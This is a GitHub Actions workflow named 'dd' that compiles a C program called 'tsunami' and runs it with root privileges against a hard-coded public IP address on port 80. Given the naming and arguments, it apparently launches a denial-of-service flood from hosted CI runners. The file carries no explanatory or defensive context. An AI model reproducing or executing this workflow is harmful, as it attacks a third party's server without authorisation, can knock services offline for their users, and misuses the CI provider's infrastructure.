name: dd
on: workflow_dispatch
jobs:
  dd:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - run: gcc -std=c23 -O3 -flto -march=native -o tsunami tsunami.c -pthread
      - run: sudo ./tsunami 216.202.205.235 80 4
